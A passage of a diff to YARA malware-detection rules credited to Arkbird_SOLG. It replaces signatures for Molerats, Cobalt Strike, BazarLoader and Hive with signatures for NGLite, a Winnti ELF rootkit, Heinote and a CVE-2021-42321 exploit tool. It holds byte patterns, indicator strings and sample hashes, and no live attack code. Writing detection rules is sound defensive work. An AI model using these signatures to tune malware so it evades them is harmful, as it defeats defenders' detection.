+		$s3 = { 0f b6 2c 13 95 80 f8 80 95 72 f0 c7 44 24 20 00 00 00 00 8b 0d 7c ?? bf 00 89 0c 24 89 44 24 04 8d 4c 24 20 89 4c 24 08 e8 77 0b 00 00 8b 44 24 0c 85 c0 75 4a c7 44 24 1c 00 00 00 00 8b 05 20 ?? bf 00 89 04 24 8b 44 24 24 89 44 24 04 8b 44 24 30 89 44 24 08 8b 44 24 34 89 44 24 0c 8d 44 24 1c 89 44 24 10 c7 44 24 14 00 00 00 00 e8 f1 0b 00 00 8b 44 24 1c 89 44 24 38 83 c4 28 c3 8b 44 24 24 89 04 24 8b 44 24 30 89 44 24 04 8b 44 24 34 89 44 24 08 e8 59 00 00 00 8b 44 24 }
+		$s4 = { 83 ec 50 c7 44 24 24 00 00 00 00 8b 05 88 ?? bf 00 89 04 24 c7 44 24 04 ff ff ff ff c7 44 24 08 fe ff ff ff c7 44 24 0c ff ff ff ff 8d 44 24 24 89 44 24 10 c7 44 24 14 00 00 00 00 c7 44 24 18 00 00 00 00 c7 44 24 1c 02 00 00 00 e8 09 04 00 00 64 8b 05 14 00 00 00 8b 80 00 00 00 00 8b 40 18 84 00 05 68 01 00 00 89 04 24 8b 44 24 24 89 44 24 04 e8 d2 86 fd ff 8d 7c 24 34 31 c0 e8 60 86 02 00 8b 05 30 ?? bf 00 89 04 24 8d 44 24 34 89 44 24 04 8d 44 24 34 89 44 24 08 c7 44 24 0c 1c 00 00 00 e8 b1 02 00 00 8b 44 24 }
+		$s5 = { 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ed 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b4 01 00 00 85 c0 74 7e 8b 05 94 ?? bf 00 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 00 00 00 00 c7 44 24 0c 00 00 00 00 c7 44 24 10 00 00 00 00 e8 ad 05 00 00 8b 44 24 14 8b 4c 24 1c 89 81 b8 01 00 00 85 c0 74 04 83 c4 18 c3 8d 05 ?? ?? 8b 00 89 04 24 e8 c9 6c 02 00 8b 05 98 ?? bf 00 8b 4c 24 1c 8b 91 b4 01 00 00 89 04 24 89 54 24 04 e8 ad 04 00 00 8b 44 24 1c c7 80 b4 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 15KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_APT_Molerats_Feb_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Nglite_Nov_2021_1 : FILE
 {
 	meta:
-		description = "Detect Molerats implants"
+		description = "Detect NGLite backdoor (version A)"
 		author = "Arkbird_SOLG"
-		id = "8ede3aa9-9788-52a5-91a7-bb160daad5ba"
-		date = "2021-02-27"
-		modified = "2021-03-01"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-28/Molerats/APT_Molerats_Feb_2021_1.yar#L1-L23"
+		id = "cf2845f3-1176-5197-9d05-f123b0f23c75"
+		date = "2021-11-09"
+		modified = "2021-11-09"
+		reference = "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-08/NGLite/MAL_NGLite_Nov_2021_1.yara#L1-L19"
 		license_url = "N/A"
-		logic_hash = "fbd98f088019434f736107dfe62a307e2c57d0288d68f3133a13de59bf318aea"
+		logic_hash = "ebafc52da76b9a960ee3c2c99955fb5dcb4acff2b7a0d7fad714bfc17617331a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		hash1 = "0a55551ade55705d4be6e946ab58a26d7cf8087558894af8799931b09d38f3bc"
-		hash2 = "c9d7b5d06cd8ab1a01bf0c5bf41ef2a388e41b4c66b1728494f86ed255a95d48"
+		hash1 = "7e4038e18b5104683d2a33650d8c02a6a89badf30ca9174576bf0aff08c03e72"
+		hash2 = "3da8d1bfb8192f43cf5d9247035aa4445381d2d26bed981662e3db34824c71fd"
+		tlp = "white"
+		adversary = "-"
 
 	strings:
-		$seq1 = { 55 8b ec 81 c4 60 fc ff ff 53 33 d2 89 95 60 fc ff ff 89 45 fc 33 c0 55 68 [1-3] 00 64 ff 30 64 89 20 8b 45 fc 83 78 44 00 0f 85 5d 01 00 00 b2 01 a1 [2] 44 00 e8 [3] ff 8b 55 fc 89 42 44 8b 45 fc 83 c0 48 e8 [3] ff 8d 85 ec fe ff ff 50 6a 40 e8 [3] ff 48 85 c0 0f 8c 18 01 00 00 40 89 45 f0 8d 85 ec fe ff ff 89 45 ec 8b 45 ec 8b 00 e8 35 ?? f5 ff 84 c0 0f 84 ec 00 00 00 8d 45 f4 50 68 19 00 02 00 6a 00 6a 00 8b 45 ec 0f b7 00 89 85 64 fc ff ff c6 85 68 fc ff ff 00 8d 8d 64 fc ff ff ba [3] 00 8d 85 6c fc ff ff e8 [3] ff 50 68 02 00 00 80 e8 [3] ff 85 c0 0f 85 a3 00 00 00 33 c0 55 68 [3] 00 64 ff 30 64 89 20 c7 45 f8 00 02 00 00 8d 45 f8 50 8d 85 ec fc ff ff 50 6a 00 6a 00 68 [3] 00 8b 45 f4 50 e8 [3] ff 85 c0 75 4f 8d 85 60 fc ff ff 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 8b 95 60 fc ff ff 8b 45 ec 8b 08 8b 45 fc 8b 40 44 8b 18 ff 53 40 8b 45 ec 8b 00 8b 55 fc 3b 42 4c 75 16 8b 45 fc 83 c0 48 8d 95 ec fc ff ff b9 00 01 00 00 e8 [3] ff 33 c0 5a 59 59 64 89 10 68 [3] 00 8b 45 f4 50 e8 [3] ff }
-		$seq2 = { 55 8b ec 81 c4 e4 fd ff ff 53 8b da 89 45 fc 8b 45 fc e8 [2] ff ff 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 83 7d fc 00 75 15 68 05 01 00 00 8d 85 e6 fd ff ff 50 6a 00 e8 [2] ff ff eb 1a 8b 45 fc e8 [2] ff ff 8b c8 8d 85 e6 fd ff ff ba 05 01 00 00 e8 da f7 ff ff 66 83 bd e6 fd ff ff 00 0f 84 a7 01 00 00 33 c0 89 45 f8 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 84 9a 00 00 00 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 02 00 00 80 e8 2b 5e ff ff 85 c0 74 7c 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 01 00 00 80 e8 0d 5e ff ff 85 c0 74 5e 8d 45 f4 50 68 19 00 0f 00 6a 00 68 70 f6 40 00 68 02 00 00 80 e8 [2] ff ff 85 c0 74 40 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 74 22 8d 45 f4 50 68 19 00 0f 00 6a 00 68 [2] 40 00 68 01 00 00 80 e8 [2] ff ff 85 c0 0f 85 e6 00 00 00 33 c0 55 68 [2] 40 00 64 ff 30 64 89 20 8d 85 e6 fd ff ff ba 05 01 00 00 e8 c9 fc ff ff 8d 45 f0 50 6a 00 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 85 c0 75 33 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 8d 85 e6 fd ff ff 50 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff eb 4b 8d 45 f0 50 6a 00 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 85 c0 75 2f 8b 45 f0 e8 [2] ff ff 89 45 f8 8d 45 f0 50 8b 45 f8 50 6a 00 6a 00 68 [2] 40 00 8b 45 f4 50 e8 [2] ff ff 8b c3 8b 55 f8 e8 [2] ff ff 33 c0 5a 59 59 64 89 10 68 [2] 40 00 83 7d f8 00 74 08 8b 45 f8 e8 [2] ff ff 8b 45 f4 50 e8 [2] ff ff }
-		$seq3 = { d1 f8 79 03 83 d0 00 03 45 80 89 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 10 01 45 d0 8b 45 a4 8b 80 e4 02 00 00 8b 40 04 29 45 d0 8b 75 8c 2b 75 d4 83 ee 02 8b 45 a4 8b 80 e4 02 00 00 2b 70 08 8b 45 a4 8b 80 e4 02 00 00 2b 70 0c 89 75 8c 6a 00 56 8b 45 d0 50 8b 45 ec e8 [2] fb ff 50 57 8b 85 68 ff ff ff 50 e8 [2] fc ff 84 db 0f 84 0d 03 00 00 a1 [3] 00 8b 00 e8 [2] 09 00 50 8b 45 b4 50 6a 23 e8 [3] ff 89 45 d8 8b 45 d8 01 45 90 83 45 94 0f 83 45 90 05 8b 45 f0 8b 40 08 8b 50 74 }
-		$s1 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword wide
-		$s2 = { 45 00 72 00 72 00 6f 00 72 00 20 00 63 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 69 00 6e 00 67 00 20 00 74 00 6f 00 20 00 73 00 65 00 72 00 76 00 65 00 72 00 3a 00 20 00 25 00 73 }
-		$s3 = { 45 00 72 00 72 00 6f 00 72 00 20 00 6f 00 70 00 65 00 6e 00 69 00 6e 00 67 00 20 00 72 00 65 00 71 00 75 00 65 00 73 00 74 00 3a 00 20 00 28 00 25 00 64 00 29 00 20 00 25 00 73 }
-		$s4 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 66 00 69 00 6c 00 65 00 20 00 22 00 25 00 73 00 22 00 2e 00 20 00 25 00 73 }
-		$s5 = { 43 00 61 00 6e 00 6e 00 6f 00 74 00 20 00 6f 00 70 00 65 00 6e 00 20 00 63 00 6c 00 69 00 70 00 62 00 6f 00 61 00 72 00 64 00 3a 00 20 00 25 00 73 }
+		$s1 = { 48 8b 05 48 e7 90 00 48 8d 0d 99 4b 99 00 48 89 04 24 48 89 4c 24 08 48 c7 44 24 10 08 02 00 00 e8 82 21 00 00 48 8b 44 24 18 48 85 c0 74 33 48 3d 08 02 00 00 77 2b 48 8d 1d 69 4b 99 00 c6 04 03 5c 48 ff c0 48 89 05 4b 3f 99 00 e9 d6 fe ff ff 31 c0 e8 8f fc 02 00 ba 09 02 00 00 e8 b5 fc 02 00 48 8d 05 fe d5 55 00 48 89 04 24 48 c7 44 24 08 24 00 00 00 e8 cc 44 00 00 31 c0 e8 65 fc 02 00 90 e8 af d2 02 }
+		$s2 = { 48 83 ec 70 48 89 6c 24 68 48 8d 6c 24 68 48 c7 44 24 30 00 00 00 00 48 c7 44 24 28 00 00 00 00 48 8b 05 bf dc 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 8d 44 24 30 48 89 44 24 10 48 8d 44 24 28 48 89 44 24 18 e8 39 17 00 00 48 83 7c 24 20 00 74 35 31 c0 31 c9 eb 24 48 89 ca 48 89 c1 bb 01 00 00 00 48 d3 e3 48 23 5c 24 30 48 8d 72 01 48 85 db 48 0f 45 d6 48 ff c0 48 89 d1 48 83 f8 40 7c d6 48 85 c9 75 3e 0f 57 c0 0f 11 44 24 38 0f 11 44 24 48 0f 11 44 24 58 48 8b 05 23 dc 90 00 48 89 04 24 48 8d 44 24 38 48 89 44 24 08 e8 10 16 00 00 8b 44 24 58 89 44 24 78 48 8b 6c 24 68 48 83 c4 70 c3 89 4c 24 78 48 8b 6c 24 68 48 }
+		$s3 = { 48 8b 05 60 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 02 07 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 10 03 00 00 48 85 c0 0f 84 80 00 00 00 48 8b 05 29 cc 90 00 48 89 04 24 0f 57 c0 0f 11 44 24 08 0f 11 44 24 18 e8 cb 06 00 00 48 8b 44 24 28 48 8b 4c 24 40 48 89 81 18 03 00 00 48 85 c0 74 0a 48 8b 6c 24 30 48 83 c4 38 c3 48 8d 05 ac e0 56 00 48 89 04 24 e8 1b b6 02 00 48 8b 05 e4 cb 90 00 48 8b 4c 24 40 48 8b 91 10 03 00 00 48 89 04 24 48 89 54 24 08 e8 5a 05 00 00 48 8b 44 24 40 48 c7 80 10 03 00 00 00 00 00 00 eb b3 48 8d 05 61 e0 56 00 48 89 04 24 e8 d8 b5 02 00 e9 6b ff ff ff 48 8b 6c 24 30 48 83 c4 38 }
+		$s4 = { 48 81 ec a0 00 00 00 48 89 ac 24 98 00 00 00 48 8d ac 24 98 00 00 00 48 c7 44 24 48 00 00 00 00 48 8b 05 8a c9 90 00 48 89 04 24 48 c7 44 24 08 ff ff ff ff 48 c7 44 24 10 fe ff ff ff 48 c7 44 24 18 ff ff ff ff 48 8d 44 24 48 48 89 44 24 20 0f 57 c0 0f 11 44 24 28 48 c7 44 24 38 02 00 00 00 e8 3b 05 00 00 65 48 8b 04 25 28 00 00 00 48 8b 80 00 00 00 00 48 8b 40 30 48 8b 4c 24 48 48 87 88 78 02 00 00 0f 57 c0 0f 11 44 24 68 0f 11 44 24 78 0f 11 84 24 88 00 00 00 48 8b 05 5f c8 90 00 48 89 04 24 48 8d 44 24 68 48 89 44 24 08 48 8d 44 24 68 48 89 44 24 10 48 c7 44 24 18 30 00 00 00 e8 59 03 00 00 48 83 7c 24 20 }
+		$s5 = { 48 8b 15 26 29 92 00 48 89 14 24 48 89 4c 24 08 48 89 44 24 10 48 c7 44 24 18 00 10 00 00 48 c7 44 24 20 04 00 00 00 e8 71 64 01 00 48 83 7c 24 28 00 40 0f 94 c6 48 8b 44 24 38 48 8b 4c 24 48 48 8b 54 24 68 48 8b 5c 24 40 e9 61 ff ff ff 48 8b 6c 24 50 48 83 c4 58 c3 48 8b 6c 24 50 48 83 c4 58 c3 e8 25 91 01 00 48 8d 05 e2 b8 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 bc 9a 01 00 48 8b 44 24 38 48 89 04 24 e8 be 97 01 00 48 8d 05 9a b1 56 00 48 89 04 24 48 c7 44 24 08 19 00 00 00 e8 95 9a 01 00 8b 44 24 34 48 89 04 24 e8 98 97 01 00 e8 73 93 01 00 e8 5e 91 01 00 48 8d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 500KB and 2 of ( $seq* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize > 40KB and 4 of ( $s* )
 }
-rule ARKBIRD_SOLG_MAL_Cobaltstrike_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_APT_Winnti_Elfx64_Aug_2020_1 : FILE
 {
 	meta:
-		description = "Detect Cobalt Strike implant"
+		description = "Detect of ELF implant used by APT Winnti in August 2020"
 		author = "Arkbird_SOLG"
-		id = "89d46993-cc1b-536b-b1ab-a0e967d0d397"
-		date = "2021-10-30"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_CobaltStrike_Oct_2021_1.yara#L1-L19"
+		id = "112e8d60-cbcb-53a7-b458-d39ee03d5c22"
+		date = "2020-08-18"
+		modified = "2020-08-18"
+		reference = "https://twitter.com/KorbenD_Intel/status/1295725146037133312"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-18/Winnti/APT_Winnti_ELFx64_Aug_2020_1.yar#L1-L34"
 		license_url = "N/A"
-		logic_hash = "4f1a2306b8279be67829d0d515063caae6a9d7a07078a43c2cbe62f675bcb450"
+		logic_hash = "ebe6e60c45336476fd91c4185eee0414c3eba83960301a610b69c8818dbb17fd"
 		score = 75
-		quality = 75
+		quality = 36
 		tags = "FILE"
-		hash1 = "f520f97e3aa065efc4b7633735530a7ea341f3b332122921cb9257bf55147fb7"
-		hash2 = "7370c09d07b4695aa11e299a9c17007e9267e1578ce2753259c02a8cf27b18b6"
-		hash3 = "bfbc1c27a73c33e375eeea164dc876c23bca1fbc0051bb48d3ed3e50df6fa0e8"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "6af8b3d31101f48911b13e49c660c10ed1d26b60267e8037d2ac174fc0d2f36c"
 
 	strings:
-		$s1 = { 48 83 ec 10 4c 89 14 24 4c 89 5c 24 08 4d 33 db 4c 8d 54 24 18 4c 2b d0 4d 0f 42 d3 65 4c 8b 1c 25 10 00 00 00 4d 3b d3 f2 73 17 66 41 81 e2 00 f0 4d 8d 9b 00 f0 ff ff 41 c6 03 00 4d 3b d3 f2 75 ef 4c 8b 14 24 4c 8b 5c 24 08 48 83 c4 10 f2 c3 }
-		$s2 = { 89 ?? 24 ?? 8b ?? 24 0c 89 ?? 24 ?? 8b ?? 24 ?? c1 ?? 0d 89 ?? 24 0c 48 8b ?? 24 10 89 ?? 24 [2] 8b ?? 24 10 }
-		$s3 = { b8 10 00 00 00 48 89 45 ?? e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 48 89 45 ?? 48 89 c8 e8 [3] 00 48 29 c4 48 89 e0 48 8b 4d ?? 8b 55 f8 89 11 4c 8b 45 ?? 4c 8b 4d f0 4d 89 08 4c 8b 55 ?? 4c 8b 5d e8 4d 89 1a 48 8b 75 ?? 48 8b 7d e0 48 89 3e c7 00 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 8b 19 4d 8b 00 4d 8b 32 48 8b 0e 48 83 ec 20 4c 89 f2 41 89 d9 ff d0 48 83 c4 20 ?? 45 }
-		$s4 = { 48 83 ec 48 44 89 4c 24 44 4c 89 44 24 38 48 89 54 24 30 48 89 4c 24 28 c7 44 24 24 ?? 00 00 00 48 8b 05 [3] 00 48 05 [2] 00 00 44 8b 4c 24 44 4c 8b 44 24 38 48 8b 54 24 30 48 8b 4c 24 28 ff d0 90 48 83 c4 }
+		$lib1 = "/usr/bin/python2.7" fullword ascii
+		$lib2 = "libxselinux" fullword ascii
+		$c1 = "/cmdlineH" fullword ascii
+		$c2 = "/proc/%d/fd/%s" fullword ascii
+		$c3 = "/proc/self/exe" fullword ascii
+		$c4 = "__gmon_start__" fullword ascii
+		$c5 = "_ITM_registerTMCloneTable" fullword ascii
+		$c6 = "_ITM_deregisterTMCloneTable" fullword ascii
+		$d1 = "/usr/bin/netstat" fullword ascii
+		$d2 = "/var/run/libudev.pid" fullword ascii
+		$d3 = "/sbin/ifup-local" fullword ascii
+		$s1 = "EAEC2CA4-AF8D-4F61-8115-9EC26F6BF4E1" fullword ascii
+		$s2 = "readdir64" fullword ascii
+		$s3 = ".note.gnu.gold-version" fullword ascii
+		$s4 = ".note.gnu.build-id" fullword ascii
+		$s5 = ".eh_frame_hdr" fullword ascii
+		$s6 = "xlstat" fullword ascii
+		$s7 = "1YZ[\\<@nYSLRR]H_PGX[XmYXGFrstuvwxyz{|}~" fullword ascii
+		$info1 = "check_is_our_proc_dir" fullword ascii
+		$info2 = "get_our_sockets" fullword ascii
+		$info3 = "is_invisible_with_pids" fullword ascii
+		$info4 = "check_if_number" fullword ascii
+		$info5 = "get_our_pids" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 20KB and 3 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 15KB and ( 1 of ( $lib* ) and 4 of ( $c* ) and 2 of ( $d* ) and 4 of ( $s* ) and 3 of ( $info* ) )
 }
-rule ARKBIRD_SOLG_MAL_Bazarloader_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_MAL_Heinote_June_2020_1 : FILE
 {
 	meta:
-		description = "Detect BazarLoader implant"
+		description = "Detect Hienote malware"
 		author = "Arkbird_SOLG"
-		id = "d6462e74-fe1d-599e-aac8-0d0942ca42ad"
-		date = "2021-10-30"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/malwrhunterteam/status/1454154412902002692"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-10-29/Hive/MAL_BazarLoader_Oct_2021_1.yara#L1-L17"
+		id = "5c0e604a-83d4-5c6f-83fa-0df878da80d8"
+		date = "2020-06-26"
+		modified = "2023-11-22"
+		reference = "https://twitter.com/JAMESWT_MHT/status/1276471822217891840"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-06-26/Heinote_June_2020-1.yar#L1-L29"
 		license_url = "N/A"
-		logic_hash = "afbe02ef9e69ac5105aaae28240d6863c9c4578c0e8fd7c86c38d975cf8acdc6"
+		logic_hash = "679f1113c9c770910d18da395b13aaef009ecdde91a0c11f931d0d7e63ed122a"
 		score = 75
-		quality = 75
+		quality = 61
 		tags = "FILE"
-		hash1 = "0ba7554e7d120ce355c6995c6af95542499e4ec2f6012ed16b32a85175761a94"
-		hash2 = "2b29c80a4829d3dc816b99606aa5aeead3533d24137f79b5c9a8407957e97b10"
-		tlp = "white"
-		adversary = "-"
+		hash1 = "e0a34b9c420ddd930b3f89c13c3f564907dd948e88f668a0fe55ce506220bd73"
 
 	strings:
-		$s1 = { 48 8b 44 24 60 c6 80 38 01 00 00 01 48 8b 44 24 60 c6 80 39 01 00 00 02 48 8b 44 24 60 c7 40 5c 03 00 00 00 b8 60 00 00 00 48 6b c0 00 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 01 00 00 00 48 8b 44 24 20 c7 40 08 02 00 00 00 48 8b 44 24 20 c7 40 0c 02 00 00 00 48 8b 44 24 20 c7 40 10 00 00 00 00 48 8b 44 24 20 c7 40 14 00 00 00 00 48 8b 44 24 20 c7 40 18 00 00 00 00 b8 60 00 00 00 48 6b c0 01 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 22 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 00 00 00 b8 60 00 00 00 48 6b c0 02 48 8b 4c 24 60 48 03 41 68 48 89 44 24 20 48 8b 44 24 20 c7 00 23 00 00 00 48 8b 44 24 20 c7 40 08 01 00 00 00 48 8b 44 24 20 c7 40 0c 01 00 00 00 48 8b 44 24 20 c7 40 10 01 00 00 00 48 8b 44 24 20 c7 40 14 01 00 00 00 48 8b 44 24 20 c7 40 18 01 }
-		$s2 = { 48 8b 44 24 50 48 8b 00 c7 40 28 10 00 00 00 48 8b 44 24 50 48 8b 00 b9 04 00 00 00 48 6b c9 00 48 8b 54 24 50 8b 92 18 01 00 00 89 54 08 2c 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 4c 24 50 e8 80 f8 ff ff 48 8b 4c 24 50 e8 c6 fe ff ff 48 8b 44 24 50 83 78 78 00 76 16 48 8b 44 24 50 83 78 74 00 76 0b 48 8b 44 24 50 83 78 7c 00 7f 1e 48 8b 44 24 50 48 8b 00 c7 40 28 21 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 50 48 8b 4c 24 50 8b 40 74 0f af 41 7c 89 44 24 24 8b 44 24 24 89 44 24 34 8b 44 24 24 39 44 24 34 74 1e 48 8b 44 24 50 48 8b 00 c7 40 28 48 00 00 00 48 8b 44 24 50 48 8b 00 48 8b 4c 24 50 ff 10 48 8b 44 24 38 c7 40 18 00 00 00 00 48 8b 4c 24 50 e8 0c fc ff ff 48 8b 4c 24 38 88 41 1c 48 8b 44 24 38 48 c7 40 20 00 00 00 00 48 8b 44 24 38 48 c7 40 28 00 00 00 00 48 8b 44 24 50 0f b6 40 62 85 c0 74 0d 48 8b 44 }
-		$s3 = { 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d 82 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 38 48 8b 4c 24 58 8b 40 10 0f af 41 0c 48 8b 4c 24 58 48 63 49 04 48 8b 94 24 c0 00 00 00 48 8b 52 08 48 89 54 24 70 c6 44 24 20 00 4c 8b 44 24 58 45 8b 48 0c 44 8b c0 48 8b 44 24 38 48 8b 54 c8 70 48 8b 8c 24 c0 00 00 00 48 8b 44 24 70 ff 50 40 48 63 4c 24 30 48 89 84 cc 80 00 00 00 e9 5c ff ff ff 48 8b 44 24 38 8b 40 18 89 44 24 40 eb 0a 8b 44 24 40 ff c0 89 44 24 40 48 8b 44 24 38 8b 40 1c 39 44 24 40 0f 8d af 01 00 00 48 8b 44 24 38 8b 40 14 89 44 24 44 eb 0a 8b 44 24 44 ff c0 89 44 24 44 48 8b 84 24 c0 00 00 00 8b 80 88 01 00 00 39 44 24 44 0f 83 6e 01 00 00 c7 44 24 50 00 00 00 00 c7 44 24 30 00 00 00 00 eb 0a 8b 44 24 30 ff c0 89 44 24 30 48 8b 84 24 c0 00 00 00 8b 80 64 01 00 00 39 44 24 30 0f 8d e2 00 00 00 48 63 44 24 30 48 8b 8c 24 c0 00 00 00 48 8b 84 c1 68 01 00 00 48 89 44 24 58 48 8b 44 24 58 8b 4c 24 44 0f af 48 38 8b c1 89 44 24 60 c7 44 24 48 00 00 00 00 eb 0a 8b 44 24 48 ff c0 89 44 24 48 48 8b }
+		$s1 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 2d 2d 2d 2d }
+		$s2 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 2d 2d 2d 2d }
+		$s3 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 47 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 47 65 74 4d 61 69 6e 50 61 67 65 20 6c 70 73 7a 75 72 6c 20 3d 20 25 73 }
+		$s4 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 4c 4f 43 4b 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 73 74 61 74 75 73 20 3d 20 25 64 2f 25 64 20 67 65 74 20 3d 20 25 73 20 73 65 74 20 3d 20 25 73 }
+		$s5 = { 44 65 62 75 67 49 6e 66 6f }
+		$s6 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 2d 2d 2d 2d }
+		$s7 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 66 61 76 20 72 65 74 20 3d 20 25 64 0a }
+		$s8 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 46 41 56 5d 5b 53 45 54 5d 5b 53 48 48 65 6c 70 65 72 5d 20 69 20 3d 20 25 64 20 6c 70 73 7a 4d 61 67 69 63 20 3d 20 25 73 0a }
+		$s9 = { 5b 44 45 42 55 47 49 4e 46 4f 5d 5b 53 45 54 43 4f 4f 4b 49 45 48 41 4f 31 32 33 5d 20 6f 6b 20 6f 6b 0a }
+		$s10 = { 75 73 65 72 6e 61 6d 65 3d 22 25 73 22 2c 20 72 65 61 6c 6d 3d 22 25 73 22 2c 20 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 75 72 69 3d 22 25 73 22 2c 20 63 6e 6f 6e 63 65 3d 22 25 73 22 2c 20 6e 63 3d 25 30 38 78 2c 20 71 6f 70 3d 25 73 2c 20 72 65 73 70 6f 6e 73 65 3d 22 25 73 22 }
+		$s11 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x" fullword ascii
+		$s12 = { 25 73 20 63 6f 6f 6b 69 65 20 25 73 3d 22 25 73 22 20 66 6f 72 20 64 6f 6d 61 69 6e 20 25 73 2c 20 70 61 74 68 20 25 73 2c 20 65 78 70 69 72 65 20 25 49 36 34 64 0a }
+		$s13 = "User-Agent: %s" fullword ascii
+		$s14 = "Send failure: %s" fullword ascii
+		$s15 = "ftp://%s:%s@%s" fullword ascii
+		$s16 = "Host: %s%s%s" fullword ascii
+		$s17 = "Referer: %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 200KB and all of ( $s* )
+		uint16( 0 ) == 0x4D5A and filesize < 450KB and 14 of them
 }
-rule ARKBIRD_SOLG_RAN_ELF_Hive_Oct_2021_1 : FILE
+rule ARKBIRD_SOLG_EXP_CVE_2021_42321_Nov_2021_1 : CVE_2021_42321 FILE
 {
 	meta:
-		description = "Detect ELF version of Hive ransomware"
+		description = "Detect CVE-2021-42321 exploit tool"
 		author = "Arkbird_SOLG"
-		id = "434cfe85-3209-5990-9c68-47ce4fafd5b8"
-		date = "2021-10-29"
-		modified = "2021-10-30"
-		reference = "https://twitter.com/ESETresearch/status/1454100591261667329"
